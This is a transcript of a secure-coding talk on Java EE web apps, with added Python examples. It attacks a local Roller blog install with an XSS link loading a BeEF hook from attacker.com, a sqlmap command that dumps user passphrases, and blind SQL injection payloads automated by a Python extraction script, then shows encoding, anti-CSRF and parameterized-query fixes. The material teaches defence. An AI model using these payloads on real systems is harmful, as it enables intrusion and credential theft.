Securing Java EE Web Apps

Post on 08-May-2015

Category: Technology

TRANSCRIPT

Securing Java EE Web Apps
Frank Kim, Principal, ThinkSec; Author, SANS Institute

About

• Frank Kim
– Consultant, ThinkSec

– Author, SANS Secure Coding in Java/JEE

– SANS Application Security Curriculum Lead

What You Should Know

• Hacking is not hard
• Don’t trust any data

– Assume that your users are evil!

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

Cross-Site Scripting (XSS)

• Occurs when untrusted data is written back into a page without encoding, so the browser treats it as markup or script instead of text
• Types of XSS
– Stored

– Reflected

– Document Object Model (DOM) based

Cross-Site Request Forgery (CSRF)

• Occurs when a state-changing request is accepted without proof that the user meant to send it; a page the attacker controls makes the victim's browser submit the request, and the browser attaches the victim's session cookie automatically

SQL Injection (SQLi)

• Occurs when SQL queries are built by concatenating untrusted data into the query text
– By injecting arbitrary SQL, attackers can extend the meaning of the original query
– Can potentially execute any SQL statement on the database

• Very powerful
– #1 on CWE/SANS Top 25 Most Dangerous Software Errors
– #1 on OWASP Top 10

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

What are We Testing?

• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take
– There are definitely other avenues of attack
– We're walking through one attack scenario

Attack Scenario

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack

- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

Spot the Vuln - XSS

XSS in head.jsp

Testing the "look" Param

• Admin pages include head.jsp
• The param is persistent for the session: the value is kept in the user's session, so the injected script is rendered again on every later page that includes head.jsp, not only on the response to the request that carried it

XSS Exploitation

• Introducing BeEF – Browser Exploitation Framework
– http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser
– Log user keystrokes, view browsing history, execute JavaScript, etc.
– Advanced attacks: Metasploit integration, browser exploits, etc.

XSS Exploitation Overview

1) Attacker sends the victim a link carrying the BeEF hook script in the "look" parameter:

http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>

2) Victim clicks the evil link; head.jsp echoes the parameter and the browser loads the hook script

3) Victim's browser sends data to the attacker

BeEF XSS Demo

Spot the Vuln - CSRF

CSRF in UserAdmin.jsp

(Screenshot annotation: "Want to use CSRF to change this field")

CSRF Demo

Spot the Vuln – SQL Injection

SQL Injection in UserServlet

SQL Injection Testing

• UserServlet is vulnerable to SQLi
http://localhost:8080/roller/roller-ui/authoring/user

Probe response: No results

Exploiting SQL Injection

• Introducing sqlmap – http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns
– Supports MySQL, Oracle, PostgreSQL, MS SQL Server
– Supports blind, inband, and batch queries
– Fingerprint/enumeration: dump db schemas, tables/column names, data, db users, etc.
– Takeover features: read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc.

sqlmap Syntax

Dump userids and passwords:

    python sqlmap.py -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID=<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

-p startsWith restricts testing to the injectable parameter; --cookie supplies the logged-in session so the servlet answers at all; --drop-set-cookie keeps sqlmap from replacing that session with cookies the server sends back; --dump -T rolleruser -C username,passphrase extracts only the two columns of interest; -v 2 raises the verbosity.

SQL Injection Demo

How it Works

sqlmap uses a boolean-based blind technique: each request appends a condition that compares the code of one character of the target value (ORD of the character MID picks out) with a number, and the servlet returns rows only when the condition is true. The trailing 'neEy' LIKE 'neEy re-uses the query's own closing quote and wildcard so the statement stays valid. Three of the probes for the first character of the third user's passphrase:

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal

Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);

returns i

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);

returns l

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);

returns o

Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));

returns 105

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));

returns 108

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));

returns 111

Attack Summary

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack

- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

Outline

• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs

Data Validation

(Diagram: the Application sits between Inbound Data and Outbound Data on one side and a Data Store on the other. Validation is applied on every inbound path, Encoding on every outbound path, in both directions. The two questions the diagram asks: "Should I be consuming this?" and "Should I be emitting this?")

Output Encoding

• Encoding – convert characters so they are treated as data and not as special characters
• Must escape differently depending on where the data is placed on the page (HTML body, attribute, JavaScript, URL, CSS each have their own encoding)
• XSS Prevention Cheat Sheet: http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Fix XSS in head.jsp

• Add URL encoding, so the theme name cannot close the href attribute or add path components:

    <%@ page import="org.owasp.esapi.ESAPI" %>
    <link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

Note that ESAPI's encodeForURL declares a checked EncodingException, so in a real page the call belongs in a helper that handles it rather than in a bare expression.
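As an added example, not code from the deck or from Roller, the contextual-encoding point in Python: the same "look" payload rendered into the head.jsp link tag unencoded and URL-encoded, a separate HTML-attribute encoder to show that the context picks the encoder, and a whitelist check for the theme name. `encode_for_url` stands in for ESAPI's encodeForURL; the theme list and the payload are constructed.

```python
import html
from urllib.parse import quote

# Constructed payload in the shape of the "look" parameter attack shown earlier.
XSS_THEME = '"><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>'

# Assumed list of installed themes; a real page would ask the theme manager.
KNOWN_THEMES = frozenset({"basic", "sotto", "rolling"})


def encode_for_url(value: str) -> str:
    """Percent-encode a value for use as one URL path segment.

    Stands in for ESAPI.encoder().encodeForURL(): everything outside the
    unreserved set (letters, digits, '-', '_', '.', '~') becomes %XX, so
    quotes, angle brackets and slashes can neither end the href attribute
    nor add path components.
    """
    return quote(value, safe="")


def encode_for_html_attribute(value: str) -> str:
    """Entity-encode for an HTML attribute context: the encoder to use if the
    value were written as attribute text rather than into a URL."""
    return html.escape(value, quote=True)


def validate_theme(theme: str) -> str:
    """Whitelist check (the 'validate input' half of the slides): an unknown
    theme name falls back to the default instead of reaching the page."""
    return theme if theme in KNOWN_THEMES else "basic"


def stylesheet_link_vulnerable(context_path: str, theme: str) -> str:
    """Pre-fix rendering of the head.jsp <link>: theme concatenated as-is."""
    return ('<link rel="stylesheet" type="text/css" media="all" '
            f'href="{context_path}/roller-ui/theme/{theme}/colors.css" />')


def stylesheet_link(context_path: str, theme: str) -> str:
    """Fixed rendering: the theme name is URL-encoded for the path segment."""
    return ('<link rel="stylesheet" type="text/css" media="all" '
            f'href="{context_path}/roller-ui/theme/{encode_for_url(theme)}/colors.css" />')


def attribute_breakout(tag: str) -> bool:
    """True if the rendered markup contains more than one tag, i.e. the
    injected value closed the href attribute and opened a new element."""
    return tag.count("<") > 1


if __name__ == "__main__":
    print(stylesheet_link_vulnerable("/roller", XSS_THEME))  # three tags: breakout
    print(stylesheet_link("/roller", XSS_THEME))             # one tag, payload is %XX data
    print(encode_for_html_attribute(XSS_THEME))              # what an attribute context needs
```

Encoding alone is the fix on the slide; running `validate_theme` before it rejects anything that is not an installed theme, which is the cheaper check and the one to add first.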

Fix CSRF

• UserAdmin.jsp – add an anti-CSRF token to the form (attribute values quoted; the token is a per-session, unguessable value that a page on another origin cannot read):

    <input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>">

• UserAdminAction.java – check the anti-CSRF token before acting on the request:

    if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
        return mapping.findForward("error");
    }

getSession(false) returns null when the request has no session, so isValid (and getToken) must treat a null session as invalid rather than dereference it.
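The per-session token pattern that the CSRFTokenUtil snippet above relies on, written out in Python as an added example; this is not Roller's or the speaker's code. The session is an in-memory dict, the attribute name and the forward names are assumptions, and the comparison is constant-time so the check cannot leak the token by timing.

```python
import hmac
import secrets

TOKEN_ATTR = "csrf_token"   # assumed session attribute name (the slide's SESSION_ATTR_KEY)


def get_token(session: dict) -> str:
    """Return the session's anti-CSRF token, minting one on first use.

    One unguessable token per session: an attacker's page cannot read it
    (same-origin policy), so a forged cross-site request cannot carry it.
    """
    if session is None:
        raise ValueError("no session to bind the token to")
    token = session.get(TOKEN_ATTR)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[TOKEN_ATTR] = token
    return token


def hidden_field(session: dict) -> str:
    """Render the hidden input UserAdmin.jsp adds to the form. token_urlsafe
    yields only [A-Za-z0-9_-], so no attribute encoding is needed here."""
    return f'<input type="hidden" name="{TOKEN_ATTR}" value="{get_token(session)}">'


def is_valid(session, request_params: dict) -> bool:
    """The check UserAdminAction performs: reject when there is no session,
    no token in the session, no token in the request, or a mismatch."""
    if session is None:
        return False
    expected = session.get(TOKEN_ATTR)
    submitted = request_params.get(TOKEN_ATTR)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_user_admin(session, request_params: dict) -> str:
    """Action dispatch: forward to 'error' unless the token checks out,
    otherwise proceed with the state change and forward to 'success'."""
    if not is_valid(session, request_params):
        return "error"
    return "success"


if __name__ == "__main__":
    victim_session = {}
    print(hidden_field(victim_session))
    forged = {"userEnabled": "true"}                       # attacker's form has no token
    print(handle_user_admin(victim_session, forged))       # error
    genuine = {"userEnabled": "true", TOKEN_ATTR: get_token(victim_session)}
    print(handle_user_admin(victim_session, genuine))      # success
```

The token must never be accepted from a cookie: the cookie is exactly what the attacker's page gets sent for free, which is why it has to travel in the form body (or a header the attacker cannot set).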

Fix SQL Injection

• Use parameterized queries correctly: a PreparedStatement only protects the query when the user-supplied value is bound with setString; it does nothing if the value is concatenated into the SQL text before prepareStatement is called.

    if (startsWith == null || startsWith.equals("")) {
        query = "SELECT username, emailaddress FROM rolleruser";
        stmt = con.prepareStatement(query);
    } else {
        query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
        stmt = con.prepareStatement(query);
        // The wildcard is appended in Java and the whole pattern is bound; quotes in startsWith are now data
        stmt.setString(1, startsWith + "%");
        stmt.setString(2, startsWith + "%");
    }
    rs = stmt.executeQuery();

One caveat: binding stops injection, but LIKE metacharacters (% and _) in startsWith are still interpreted as wildcards, so a user can list every account by searching for "%". Escape them (and use an ESCAPE clause) if that matters.
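As an added example serving both the How it Works / Step By Step slides and the fix above (not the deck's or Roller's code), the blind extraction and the fix side by side in Python. SQLite stands in for MySQL: the payloads from the slides run verbatim because MySQL's ORD() and MID() are registered as user-defined functions and the database is attached under the name roller. The sample rows, the shape of the vulnerable query (inferred from the fixed one on the slide) and the function names are assumptions.

```python
import sqlite3

# Constructed sample rows. The third passphrase is the value the Step By Step
# slides recover. They are in the clear only because that is what the demo
# dumps; a real application stores a salted hash, never the passphrase itself.
USERS = [
    ("frank", "frank@example.org", "correct horse battery"),
    ("fiona", "fiona@example.org", "hunter2"),
    ("fred", "fred@example.org", "ilovethetajmahal"),
]

# The scalar subquery from the How it Works slide, unchanged.
SUBQUERY = ("(SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) "
            "FROM roller.rolleruser LIMIT 2, 1)")


def make_db() -> sqlite3.Connection:
    """In-memory SQLite standing in for Roller's MySQL database. The schema is
    attached as 'roller' so 'roller.rolleruser' resolves, and MySQL's ORD()
    and MID() are registered as user functions so the payloads run verbatim."""
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE ':memory:' AS roller")
    con.execute("CREATE TABLE roller.rolleruser "
                "(username TEXT, emailaddress TEXT, passphrase TEXT)")
    con.executemany("INSERT INTO roller.rolleruser VALUES (?, ?, ?)", USERS)
    con.create_function("ORD", 1, lambda s: ord(s[0]) if s else 0)   # MySQL: ORD('') = 0
    con.create_function("MID", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    return con


def search_vulnerable(con, starts_with: str):
    """Assumed pre-fix shape of UserServlet's query (inferred from the fixed
    version on the slide): the parameter is pasted into both LIKE patterns."""
    sql = ("SELECT username, emailaddress FROM rolleruser "
           f"WHERE username like '{starts_with}%' or emailaddress like '{starts_with}%'")
    return con.execute(sql).fetchall()


def search_fixed(con, starts_with: str):
    """The slide's fix: the pattern is bound as a parameter, so quote
    characters in it are data, not SQL."""
    if not starts_with:
        return con.execute("SELECT username, emailaddress FROM rolleruser").fetchall()
    sql = ("SELECT username, emailaddress FROM rolleruser "
           "WHERE username like ? or emailaddress like ?")
    return con.execute(sql, (starts_with + "%", starts_with + "%")).fetchall()


def oracle(con, condition: str) -> bool:
    """One boolean-based blind probe: the servlet shows rows only when the
    injected condition holds. The trailing 'neEy' LIKE 'neEy re-uses the
    query's own closing quote and % so the statement stays valid."""
    payload = f"f%' AND {condition} AND 'neEy' LIKE 'neEy"
    return len(search_vulnerable(con, payload)) > 0


def extract_char_code(con, pos: int) -> int:
    """Recover ORD(MID(subquery, pos, 1)) by bisection over the ASCII range.
    Each probe is a '> N' comparison like the three on the slide; about
    seven requests per character instead of one per candidate value."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(con, f"ORD(MID({SUBQUERY}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_value(con) -> str:
    """Dump the whole passphrase; ORD of a position past the end is 0."""
    chars, pos = [], 1
    while (code := extract_char_code(con, pos)) != 0:
        chars.append(chr(code))
        pos += 1
    return "".join(chars)


def step_by_step(con):
    """Replay the Step By Step slides: (MID, ORD) for positions 1..3."""
    return [con.execute(f"SELECT MID({SUBQUERY}, {p}, 1), ORD(MID({SUBQUERY}, {p}, 1))").fetchone()
            for p in (1, 2, 3)]


def leaks_boolean(con, search) -> bool:
    """Does a search function give the attacker an oracle? True when a true
    condition returns rows and a false one returns none."""
    hit = search(con, "f%' AND 1=1 AND 'neEy' LIKE 'neEy")
    miss = search(con, "f%' AND 1=2 AND 'neEy' LIKE 'neEy")
    return len(hit) > 0 and len(miss) == 0


if __name__ == "__main__":
    db = make_db()
    print(step_by_step(db))                                       # [('i', 105), ('l', 108), ('o', 111)]
    print(extract_value(db))                                      # ilovethetajmahal
    print(leaks_boolean(db, search_vulnerable), leaks_boolean(db, search_fixed))  # True False
```

Against `search_fixed` the same payload is just an unusual prefix that matches nobody, so both the true and the false probe come back empty and the oracle disappears; the bisection loop would read every character as 0.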

Building Secure Software

(Diagram; source: Microsoft SDL)

Remember

• Hacking is not hard
• Don’t trust any data
– Validate input
  • Prefer whitelists
  • Use authenticity tokens
– Encode output
  • Contextual encoding
  • Use parameterized queries

SANS Software Security

• SANS AppSec 2012 – April 30 - May 1 in Las Vegas – CFP is open now! – http://sans.org/appsec-2012
• New courses – DEV551 Secure iOS Development; DEV568 Secure Android Development
• Free resources – Top 25, blog, white papers, webcasts, and more at http://software-security.sans.org
• Discount – Save 10% using the discount code DEVOXX. Enterprise pricing available.

Thanks!

Frank Kim, frank@thinksec.com, @sansappsec